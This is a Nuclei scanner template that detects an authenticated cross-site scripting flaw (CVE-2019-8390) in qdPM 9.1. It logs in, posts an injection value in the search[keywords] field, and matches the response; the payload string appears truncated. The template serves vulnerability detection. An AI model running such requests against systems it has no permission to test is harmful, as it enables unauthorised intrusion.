id: CVE-2019-8390

info:
  name: qdPM 9.1 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
  remediation: |
    Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/46399/
    - http://qdpm.net/download-qdpm-free-project-management
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8390
    - http://sourceforge.net/projects/qdpm
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-8390
    cwe-id: CWE-79
    epss-score: 0.0161
    epss-percentile: 0.86007
    cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qdpm
    product: qdpm
    shodan-query: http.favicon.hash:762074255
  tags: cve,cve2019,xss,qdpm,authenticated,edb

http:
  - raw:
      - |
        GET /index.php/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=

      - |
        POST /index.php/users HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search[keywords]=e">&search_by_extrafields[]=9

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ''
          - 'alert alert-info alert-search-result'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="login\[_csrf_token\]" value="(.*?)"'
        internal: true
        part: body
# digest: 4a0a00473045022100db2148a682c84e0c655f4b8d8144e1f85bbb0d6610ff43e099ab2162d9075184022066b137fb5a1e4cf829e8d570f1fcfc0b2b1cd8c2cc0a557711bc0b26c927897e:922c64590222798bb761d5b6d8e72950